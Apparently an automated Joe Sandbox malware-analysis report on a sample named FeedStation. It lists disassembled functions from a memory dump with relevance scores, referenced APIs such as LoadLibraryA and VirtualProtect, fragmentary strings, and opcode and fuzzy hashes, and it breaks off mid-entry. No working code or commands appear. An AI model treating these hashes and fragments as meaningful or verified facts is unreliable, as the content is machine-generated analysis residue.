Function 02530898 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A

Strings

.dll, xrefs: 025308CF

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: e0c3c108883e0d31f5e11cd012f2b262a03796eedfc9c436e0107166954bd45b
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: D721E4766043859FE722CFA8C884B6ABFA8FF05324F08516DD8418BA81D730E845CB88

Function 0252E775 Relevance: 3.0, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02530898: LoadLibraryA.KERNEL32(00000000,?,?), ref: 0253092A

VirtualProtect.KERNEL32(00000000,00000004,00000040,?), ref: 0252E7AD
VirtualProtect.KERNEL32(00000000,00000004,?,?), ref: 0252E7D0

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction ID: 69721b5c0567a50cc24648641bf35af0e653955cdcfb56466f4135740e68c133
Opcode Fuzzy Hash: 355f7a5a870867b02340d2dab44903ecb3bac44aab23468b058fab7a7d97728b
Instruction Fuzzy Hash: 47F081B21406147AF611A665CC42FFB77ECEB85A11F040428FB06D60C0E771B6058BA9

Non-executed Functions

Function 024F3462 Relevance: 112.1, Strings: 88, Instructions: 2099COMMON

Download Yara Rule

Strings

1, xrefs: 024F4C40
^, xrefs: 024F4688
{, xrefs: 024F35F1
I, xrefs: 024F4993
Z, xrefs: 024F373F
Q, xrefs: 024F40FF
I, xrefs: 024F3744
/, xrefs: 024F3F06
p, xrefs: 024F4933
K, xrefs: 024F4A63
p, xrefs: 024F486D
9, xrefs: 024F44B0
L, xrefs: 024F3AB4
y, xrefs: 024F3D9C
+, xrefs: 024F4963
-, xrefs: 024F3EFC
', xrefs: 024F49C3
., xrefs: 024F34CB
., xrefs: 024F3F01
l, xrefs: 024F4863
-, xrefs: 024F49F3
O, xrefs: 024F4A73
=, xrefs: 024F4CA0
3, xrefs: 024F4C50
X, xrefs: 024F3C29
", xrefs: 024F381C
?, xrefs: 024F4CB0
\, xrefs: 024F4678
M, xrefs: 024F4903
, xrefs: 024F4A23
j, xrefs: 024F4A43
(, xrefs: 024F3EF7
/, xrefs: 024F50AB
;, xrefs: 024F4C90
x, xrefs: 024F48F3
T, xrefs: 024F46B8
R, xrefs: 024F3C79
P, xrefs: 024F4698
H, xrefs: 024F46D8
8, xrefs: 024F41E2
/, xrefs: 024F4C30
m, xrefs: 024F40DF
f, xrefs: 024F49A3
k, xrefs: 024F3C39
e, xrefs: 024F3C69
F, xrefs: 024F48D3
-, xrefs: 024F4C20
2, xrefs: 024F3553
E, xrefs: 024F354E
n, xrefs: 024F3C59
0, xrefs: 024F3C41
V, xrefs: 024F3549
-, xrefs: 024F452D
K, xrefs: 024F4923
W, xrefs: 024F40EF
B, xrefs: 024F3959
R, xrefs: 024F46A8
?, xrefs: 024F4532
q, xrefs: 024F4872
B, xrefs: 024F4913
t, xrefs: 024F3C49
D, xrefs: 024F5387
W, xrefs: 024F46D0
K, xrefs: 024F4943
X, xrefs: 024F4658
Z, xrefs: 024F4668
K, xrefs: 024F509B
4, xrefs: 024F3C61
P, xrefs: 024F41BA
>, xrefs: 024F3C31
2, xrefs: 024F3C51
Q, xrefs: 024F41AA
V, xrefs: 024F46C8
9, xrefs: 024F4C80
U, xrefs: 024F4953
", xrefs: 024F4A13
7, xrefs: 024F4C70
5, xrefs: 024F4C60
j, xrefs: 024F4983
6, xrefs: 024F3C71
`, xrefs: 024F42D4
U, xrefs: 024F4A33
w, xrefs: 024F48C3
D, xrefs: 024F4E6E
2, xrefs: 024F49E3
x, xrefs: 024F3821
L, xrefs: 024F48E3
f, xrefs: 024F49B3

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: $"$"$'$($+$-$-$-$-$.$.$/$/$/$0$1$2$2$2$3$4$5$6$7$8$9$9$;$=$>$?$?$B$B$D$D$E$F$H$I$I$K$K$K$K$L$L$M$O$P$P$Q$Q$R$R$T$U$U$V$V$W$W$X$X$Z$Z$\$^$`$e$f$f$j$j$k$l$m$n$p$p$q$t$w$x$x$y${
API String ID: 0-475241549
Opcode ID: 906ba59493c2f70ab94024ff61eb43d05a96a63e8b4e3143cfa70f6e8341602c
Instruction ID: b59dd90653777beef140142f0ed505e59a97f31aed7ee90eb8c92ec5a4ef6823
Opcode Fuzzy Hash: 906ba59493c2f70ab94024ff61eb43d05a96a63e8b4e3143cfa70f6e8341602c
Instruction Fuzzy Hash: E713BD3150C7C18AD375DB3884443AFBBE2ABD6324F098A6ED5EA873D1DA748446CB53

Function 025152DD Relevance: 72.9, Strings: 58, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 025155F9
u, xrefs: 0251563F
u, xrefs: 0251577C
m, xrefs: 0251575C
K, xrefs: 02515551
R, xrefs: 025155A5
+, xrefs: 025153C2
V, xrefs: 02515543
), xrefs: 025153B4
9, xrefs: 02515424
o, xrefs: 02515623
S, xrefs: 0251531A
-, xrefs: 025153D0
#, xrefs: 0251538A
Q, xrefs: 025155C1
L, xrefs: 0251556D
z, xrefs: 02515790
], xrefs: 02515360
_, xrefs: 0251536E
M, xrefs: 025152F0
R, xrefs: 025155EB
;, xrefs: 02515432
^, xrefs: 025155B3
_, xrefs: 02515589
/, xrefs: 025153DE
[, xrefs: 02515352
y, xrefs: 0251578C
k, xrefs: 02515669
C, xrefs: 0251557B
s, xrefs: 02515774
k, xrefs: 0251565B
?, xrefs: 0251544E
1, xrefs: 025153EC
3, xrefs: 025153FA
Q, xrefs: 0251530C
q, xrefs: 0251576C
O, xrefs: 02515597
M, xrefs: 02515607
5, xrefs: 02515408
, xrefs: 02515615
a, xrefs: 02515631
9, xrefs: 02515685
Y, xrefs: 02515344
k, xrefs: 02515677
W, xrefs: 02515336
O, xrefs: 025152FE
', xrefs: 025153A6
{, xrefs: 02515794
=, xrefs: 02515440
%, xrefs: 02515398
4, xrefs: 0251587C
7, xrefs: 02515416
U, xrefs: 02515328
!, xrefs: 0251537C
L, xrefs: 025155DD
o, xrefs: 02515764
{, xrefs: 0251564D
w, xrefs: 02515784

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: $!$#$%$'$)$+$-$/$1$3$4$5$7$9$9$;$=$?$C$K$L$L$M$M$O$O$Q$Q$R$R$S$U$U$V$W$Y$[$]$^$_$_$a$k$k$k$m$o$o$q$s$u$u$w$y$z${${
API String ID: 0-2966811575
Opcode ID: 2581c959981cfe26736055786fb7a9c9f082cac7fa32867cf63a1538540ca70d
Instruction ID: caabb0c7acc920ab16ddd68954c85f3ea958ee7eb258120366338247487bd31d
Opcode Fuzzy Hash: 2581c959981cfe26736055786fb7a9c9f082cac7fa32867cf63a1538540ca70d
Instruction Fuzzy Hash: 642230219087EA89DB32C67C8C087DDBEA11B63324F0847D9D5E96B2D2D3750B85CB66

Function 02516021 Relevance: 39.0, Strings: 31, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p, xrefs: 025160C0
&, xrefs: 02516073
D, xrefs: 0251606C
h, xrefs: 025160F8
`, xrefs: 0251611B
c, xrefs: 02516065
l, xrefs: 0251610B
z, xrefs: 02516096
L, xrefs: 02516034
|, xrefs: 025160A4
f, xrefs: 02516133
@, xrefs: 02516050
b, xrefs: 02516123
j, xrefs: 02516103
N, xrefs: 02516042
v, xrefs: 025160EA
A, xrefs: 0251611F
<, xrefs: 025161FE
>, xrefs: 02516207
B, xrefs: 0251605E
0, xrefs: 02516317
S, xrefs: 025160D5
?, xrefs: 0251602D
x, xrefs: 02516088
I, xrefs: 025160FF
F, xrefs: 0251607A
r, xrefs: 025160CE
~, xrefs: 025160B2
n, xrefs: 02516113
t, xrefs: 025160DC
d, xrefs: 0251612B

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: &$0$<$>$?$@$A$B$D$F$I$L$N$S$`$b$c$d$f$h$j$l$n$p$r$t$v$x$z$|$~
API String ID: 0-2711495387
Opcode ID: aadb9f6d3dc9a9009c455ba88745c7d5257f07ec00266d52a1766d257a0c4ee8
Instruction ID: 32444aeecb9eeed7c8bb00f77161f74ff3b2eaad8136a3b0dcab50b6f91c56aa
Opcode Fuzzy Hash: aadb9f6d3dc9a9009c455ba88745c7d5257f07ec00266d52a1766d257a0c4ee8
Instruction Fuzzy Hash: 27E170219087E98EDB32C67C88443DDBFA16B53224F1843D8D4E9AB3D2C7754A85CB66

Function 02504962 Relevance: 31.7, Strings: 25, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9Q<S, xrefs: 025049E5
D1n3, xrefs: 0250498D
;_, xrefs: 02504CAC
G5A7, xrefs: 02504FB3
|!m#, xrefs: 02504F7C
't+v, xrefs: 02505143
z=x?, xrefs: 02504FC9
M9y;, xrefs: 02504FBE
`a, xrefs: 02504DF6
G%T', xrefs: 02504972
G)Y+, xrefs: 0250497A
3AbC, xrefs: 025049B9
!G, xrefs: 025052B2, 025052EA, 025050C4, 02504E8F
-M)O, xrefs: 025049DA
3UvW, xrefs: 025049F0
l1K3, xrefs: 02504FA8
OD, xrefs: 02504ECC
JG, xrefs: 02504EED
c5_7, xrefs: 02504998
>]-_, xrefs: 02504A06
LM, xrefs: 025054C4
;I9K, xrefs: 025049CF
N], xrefs: 02504CB7
m!K#, xrefs: 02504B67
S=I?, xrefs: 025049AE

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: !G$'t+v$-M)O$3AbC$3UvW$9Q<S$;I9K$;_$>]-_$D1n3$G%T'$G)Y+$G5A7$JG$LM$M9y;$N]$OD$S=I?$`a$c5_7$l1K3$m!K#$z=x?$|!m#
API String ID: 0-2088926519
Opcode ID: 04c7323f5b57a6440de9a12a99b57cbabf3c0dd89c585ad329e8b931b2b7c45f
Instruction ID: 6972e0adf18188943a42d5b57ce413e63820be1388f46dceddd1366630a53bbf
Opcode Fuzzy Hash: 04c7323f5b57a6440de9a12a99b57cbabf3c0dd89c585ad329e8b931b2b7c45f
Instruction Fuzzy Hash: C0420BB160C7848AD334CF55E842BCBBAF2EBC2344F018C2DC5E95B246DB71854A8B97

Function 024F1239 Relevance: 19.7, Strings: 15, Instructions: 905COMMON

Download Yara Rule

Strings

r, xrefs: 024F1AE7
w, xrefs: 024F1AEF
Y, xrefs: 024F1413
_, xrefs: 024F15C4
=, xrefs: 024F176E
+, xrefs: 024F1C69
q, xrefs: 024F1498
A, xrefs: 024F17FA
^, xrefs: 024F164D
>, xrefs: 024F12C9
+, xrefs: 024F1247
!, xrefs: 024F13AC
x, xrefs: 024F1AF7
a, xrefs: 024F16DC
W, xrefs: 024F17F2

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: !$+$+$=$>$A$W$Y$^$_$a$q$r$w$x
API String ID: 0-1903934733
Opcode ID: c72b3dbd0ac8f7998619dc0ac791d4a5c7b8c0bf5ab5689da4cfe29e2eca5f4b
Instruction ID: efd1a46900ea1ed683e1c6a9ab6fee6bf2b5707f4ca5d3ddb754d9004bb5b085
Opcode Fuzzy Hash: c72b3dbd0ac8f7998619dc0ac791d4a5c7b8c0bf5ab5689da4cfe29e2eca5f4b
Instruction Fuzzy Hash: F0828D7160C7908BD768DB38C4943AFBBE2ABC5314F098A6ED5DE87381D6798845CB43

Function 02501C62 Relevance: 18.1, Strings: 14, Instructions: 569COMMON

Download Yara Rule

Strings

^, xrefs: 025020A1
S, xrefs: 02502282
G, xrefs: 0250209C
}, xrefs: 02501E9E
,, xrefs: 025021F1
T, xrefs: 02502287
P, xrefs: 02501F40
R, xrefs: 02501F4A
!@, xrefs: 02501C95
S, xrefs: 02501F4F
W, xrefs: 0250227D
T, xrefs: 02501F54
], xrefs: 02502097
P, xrefs: 025020A6

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$G$P$P$R$S$S$T$T$W$]$^$}
API String ID: 0-1306667988
Opcode ID: f88ad0a9d7d72f4720d78aad85d15e6950f1308f06f1ecf526e9ee72e3b946b2
Instruction ID: 2bac4d4ec3e3bc69d87ff4cc37540e5ac70646a7f05a991bc5a254b0e741a9ba
Opcode Fuzzy Hash: f88ad0a9d7d72f4720d78aad85d15e6950f1308f06f1ecf526e9ee72e3b946b2
Instruction Fuzzy Hash: 9522907160C7818FD3249B28C89876EBBE1BB85314F188A2DE9DAC73D1D7798845CB47

Function 024FEB92 Relevance: 17.1, Strings: 13, Instructions: 840COMMON

Download Yara Rule

Strings

LPUU, xrefs: 024FEF09
mRjT, xrefs: 024FF286
gscg, xrefs: 024FEF19
V+41, xrefs: 024FF2CA
MKYD, xrefs: 024FEEE9
"9b(, xrefs: 024FEF49
fVXX, xrefs: 024FF28E
OFK[, xrefs: 024FEEF1
66/(, xrefs: 024FEFAA
4lT&, xrefs: 024FEF9F
szwg, xrefs: 024FEF39
&sjz, xrefs: 024FEFB5
Z[ST, xrefs: 024FEF01

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: "9b($&sjz$4lT&$66/($LPUU$MKYD$OFK[$V+41$Z[ST$fVXX$gscg$mRjT$szwg
API String ID: 0-124522135
Opcode ID: 80392348d36f0f8f2d0d5e7841bd84b0b3d09eb3fc40c5e422f88eb75baf3c4d
Instruction ID: 6cd68d237fa6d4ab7c98323c07db468e2f66e889489244faf3da8365ccd82cbe
Opcode Fuzzy Hash: 80392348d36f0f8f2d0d5e7841bd84b0b3d09eb3fc40c5e422f88eb75baf3c4d
Instruction Fuzzy Hash: D852147150C3918FD721CF24C88076BBBE1AFD6314F098A6EE8E49B392D775850ACB52

Function 024F2A85 Relevance: 10.5, Strings: 8, Instructions: 498COMMON

Download Yara Rule

Strings

$, xrefs: 024F2E26
O, xrefs: 024F3015
w, xrefs: 024F2AE5
2, xrefs: 024F2C48
T, xrefs: 024F2DB2
6, xrefs: 024F2E21
T, xrefs: 024F2C60
D, xrefs: 024F2A93

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: $$2$6$D$O$T$T$w
API String ID: 0-2635766767
Opcode ID: fab728461717a67d840526f6e8ac537f6d741b873b6e85f182b949f1bdffb2ed
Instruction ID: 6428b6958c22109a3dc611467dd69f8bca18b6697f3cbb66ca389e606cea9af4
Opcode Fuzzy Hash: fab728461717a67d840526f6e8ac537f6d741b873b6e85f182b949f1bdffb2ed
Instruction Fuzzy Hash: 2412B07160D7908BD765DF38C4803AFBBE2ABC5320F194A6ED9EA873D1D6748845CB42

Function 024FD0B2 Relevance: 10.3, Strings: 8, Instructions: 277COMMON

Download Yara Rule

Strings

%]^_, xrefs: 024FD3D9
%\8^, xrefs: 024FD210, 024FD214
'U"W, xrefs: 024FD3C9
DWW, xrefs: 024FD153
@A, xrefs: 024FD331
dWW, xrefs: 024FD1FD
wh, xrefs: 024FD0D2
7Y([, xrefs: 024FD3D1

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: %\8^$%]^_$'U"W$7Y([$@A$DWW$dWW$wh
API String ID: 0-3129458299
Opcode ID: 2135eb0e4b37efe33b7fdbc5a9b07736d8034935d068c60e40b09773910363d5
Instruction ID: 9775f7052c220c8d589803cfffaa87c9890bd851af590a57157830666b821477
Opcode Fuzzy Hash: 2135eb0e4b37efe33b7fdbc5a9b07736d8034935d068c60e40b09773910363d5
Instruction Fuzzy Hash: 89913372A1C3048BC708CF66C8811AFBBE2EBD0310F598A2DE5D99B351D635C619CB86

Function 024EACA2 Relevance: 9.2, Strings: 7, Instructions: 404COMMON

Download Yara Rule

Strings

-Q), xrefs: 024EADBB
5, xrefs: 024EAE44
nnhl, xrefs: 024EB0A0
EG7J, xrefs: 024EADA3
"&\(, xrefs: 024EADC3
3O52, xrefs: 024EADAB
W, xrefs: 024EAFD7

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: "&\($-Q)$3O52$5$EG7J$W$nnhl
API String ID: 0-531127086
Opcode ID: 75f133f1c62d021afef939ff7a285d2e08852c6d229f2afdf9374fcf5f20e104
Instruction ID: 72e0e59e42cf22eec5f49c5808bded28043822a48c43b3f62f3bb0a07306f175
Opcode Fuzzy Hash: 75f133f1c62d021afef939ff7a285d2e08852c6d229f2afdf9374fcf5f20e104
Instruction Fuzzy Hash: 1FB106B150C3908BD716CF2984A076BBFE1AFD7206F48896DE4D64F342D3398909CB56

Function 02517912 Relevance: 8.3, Strings: 6, Instructions: 782COMMON

Download Yara Rule

Strings

vw, xrefs: 02517D17
M!@#, xrefs: 02517DDC
:, xrefs: 02517A8A
(), xrefs: 02517DEC
A%T', xrefs: 02517DE4
XYZ[, xrefs: 02518185

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: ()$:$A%T'$M!@#$XYZ[$vw
API String ID: 0-4198765693
Opcode ID: 6a8b1f7c741e56b62f4497c83b1da4a9edabe85e9e038eec9cedee57fcb23da6
Instruction ID: 96e2f98cacc3242dd7d54b2a6ad6dd3b5f4419c8091146cecb6ed522feb804b4
Opcode Fuzzy Hash: 6a8b1f7c741e56b62f4497c83b1da4a9edabe85e9e038eec9cedee57fcb23da6
Instruction Fuzzy Hash: FE42E072A083418BE724CF28C88576BBBE1FFC9314F148A2DE9959B390D774D905CB96

Function 02501112 Relevance: 7.9, Strings: 6, Instructions: 425COMMON

Download Yara Rule

Strings

cv, xrefs: 0250149F, 02501480
Z$A&, xrefs: 025011A7
'^_P, xrefs: 02501558
cv, xrefs: 0250123C
jXZ, xrefs: 025011AF
!DEF, xrefs: 025011E7

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: !DEF$'^_P$Z$A&$cv$cv$jXZ
API String ID: 0-3433727921
Opcode ID: 44ec7e99e171cd3c56f0e9820b4923fd075e44292e432034400d61a1313e7d18
Instruction ID: 063232e5128c0751eae0dc01ad51981e43ddf060e3fdef24d8a3f5373fda782d
Opcode Fuzzy Hash: 44ec7e99e171cd3c56f0e9820b4923fd075e44292e432034400d61a1313e7d18
Instruction Fuzzy Hash: 7BB1EFB05187508BC724DF24C8917ABBBF1FF82714F188A5CE9DA4B3A0E3799841CB56

Function 024FAA42 Relevance: 7.5, Strings: 5, Instructions: 1296COMMON

Download Yara Rule

Strings

:\9^, xrefs: 024FAE07
CD, xrefs: 024FADEE
3^ , xrefs: 024FACB1
I,~M, xrefs: 024FB81A
/^ , xrefs: 024FAC53

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: /^ $3^ $:\9^$CD$I,~M
API String ID: 0-2906852946
Opcode ID: 38da18ba0b9e5e909de58192f22536077d5a2d933b5bb99657bbc4f598f7cf89
Instruction ID: 2f22f484510d2e64259f53b3f261f5cc1d54b5f19b27dd64686b3f78f1410d65
Opcode Fuzzy Hash: 38da18ba0b9e5e909de58192f22536077d5a2d933b5bb99657bbc4f598f7cf89
Instruction Fuzzy Hash: 7A8200756483809BE764CF25CD81B2BBBE2EBCA718F18C92EE6C547351D735D8028B42

Function 024EB0E2 Relevance: 6.6, Strings: 5, Instructions: 352COMMON

Download Yara Rule

Strings

;'#5, xrefs: 024EB2D2
;'#5, xrefs: 024EB198, 024EB162, 024EB267
s, xrefs: 024EB25B
{1-N, xrefs: 024EB1B2
bc, xrefs: 024EB4A5

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: ;'#5$;'#5$bc$s${1-N
API String ID: 0-3514434411
Opcode ID: d20de5c0905d2079f3c68b2f41b171f524789e489d8d70a3f3f5b86ecfdd41a7
Instruction ID: 2b6a06a9b4f811d5a95d6a3f14b9695b6314b3becd0bf9ab0d39d4cfa773da8b
Opcode Fuzzy Hash: d20de5c0905d2079f3c68b2f41b171f524789e489d8d70a3f3f5b86ecfdd41a7
Instruction Fuzzy Hash: 77B1F2B150C3808BE718DF65C890A6FBBE6FF92304F18486DE5D28B251D778C60ACB56

Function 0250C00F Relevance: 5.4, Strings: 4, Instructions: 442COMMON

Download Yara Rule

Strings

MppK, xrefs: 0250C10B
oA/-, xrefs: 0250C573
$:F@, xrefs: 0250C4C2
E, xrefs: 0250C4CD

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: $:F@$E$MppK$oA/-
API String ID: 0-362282541
Opcode ID: ee279678633620b833d1a636f38f3a00abc2d448d510a6684df181e9c1ea7536
Instruction ID: 956e87e6d498a6984d480bbf71a1a3a83497434775b0c8fd0a3aad6319715056
Opcode Fuzzy Hash: ee279678633620b833d1a636f38f3a00abc2d448d510a6684df181e9c1ea7536
Instruction Fuzzy Hash: B4D1E33161C7C18ED7258B2888907BBBFD2BFA3215F188A6EC0D98B2C2D7758506C757

Function 024FA304 Relevance: 5.3, Strings: 4, Instructions: 334COMMON

Download Yara Rule

Strings

Y, xrefs: 024FA4D7
BD, xrefs: 024FA59E
QR, xrefs: 024FA5BE
'Z\, xrefs: 024FA5AE

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: 'Z\$QR$Y$BD
API String ID: 0-1450262077
Opcode ID: df0e679de3656e3ae7bd0b83e6567443406a372a2dbbd4126f89919701580893
Instruction ID: 489e13939464550107ef816e795b5e10602747e4e0e5f4b23161177a1edf43a5
Opcode Fuzzy Hash: df0e679de3656e3ae7bd0b83e6567443406a372a2dbbd4126f89919701580893
Instruction Fuzzy Hash: 609167715083608BD729CF24C4A2ABBB7E2FFD5304F08896ED5DA4B391E7748945CB92

Function 02517612 Relevance: 5.2, Strings: 4, Instructions: 229COMMON

Download Yara Rule

Strings

Z, xrefs: 02517621
U, xrefs: 02517630
S, xrefs: 02517626
T, xrefs: 0251762B

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: S$T$U$Z
API String ID: 0-3784216321
Opcode ID: 584b030b7ed575e8b4aed262f7b4e7b4a56eb781e39c498705694f52f64c6f7c
Instruction ID: 9385bc4f63fce8197b84d3474a98fb4d72915012a7fc2f5d9ad02d93ecb664d5
Opcode Fuzzy Hash: 584b030b7ed575e8b4aed262f7b4e7b4a56eb781e39c498705694f52f64c6f7c
Instruction Fuzzy Hash: 8091813550C7809EE3148B3C849466BFFD2ABCA328F184E6DE4E6972D2C775C945CB4A

Function 024F697D Relevance: 4.0, Strings: 3, Instructions: 288COMMON

Download Yara Rule

Strings

T!K#, xrefs: 024F6BC0
K%H', xrefs: 024F6BC8
t)*+, xrefs: 024F6BD0

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: K%H'$T!K#$t)*+
API String ID: 0-1460954988
Opcode ID: 32a693592f53446fd75c7522a6d2e013373b566441ba205e90359a66585307c6
Instruction ID: 41dd806f21a6260b9a1252c027e5b1a7887ba8d9b1e96e6f977b24222ec276af
Opcode Fuzzy Hash: 32a693592f53446fd75c7522a6d2e013373b566441ba205e90359a66585307c6
Instruction Fuzzy Hash: 54911972A183228BC718CF28C89176BB7F1EFD5750F19895EE8D58B354E7348945C782

Function 025095D2 Relevance: 4.0, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

4^ , xrefs: 02509842
0^ , xrefs: 0250980E
JL, xrefs: 02509769

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: 0^ $4^ $JL
API String ID: 0-702367050
Opcode ID: 2ff0124fff0e072c742c4c6f89a0b6b4a236fa3534c1a8160da1a9a8dd888269
Instruction ID: 8a87f2bb2739d01d216d91cb89ed36a76726a97d9235dcf3d14d6cd7cf1f61d6
Opcode Fuzzy Hash: 2ff0124fff0e072c742c4c6f89a0b6b4a236fa3534c1a8160da1a9a8dd888269
Instruction Fuzzy Hash: 17610775901716CBCB208FA8C8917ABF7F1FF46720F14894CD8A66B795E378A801CB58

Function 024E6822 Relevance: 3.3, Strings: 2, Instructions: 791COMMON

Download Yara Rule

Strings

0, xrefs: 024E7124
8, xrefs: 024E711C

Memory Dump Source

Source File: 00000000.00000002.2417944379.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_FeedStation.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: d3cda387a9768c09ff015c7b8e5be94765b17e9e7b1ff2866a36fc537d35600e
Instruction ID: eb32cd1c4ff21b200171c91ec6a9756e4cff04f7c8f5aae766c5dcff20d4a482
Opcode Fuzzy Hash: d3cda387a9768c09ff015c7b8e5be94765b17e9e7b1ff2866a36fc537d35600e
Instruction Fuzzy Hash: 387247715083409FEB10CF18C884BABBBE5BF94319F05891EF99A8B391D375D958CB92

Function 024EC5D2 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

P[\], xrefs: 024EC71D
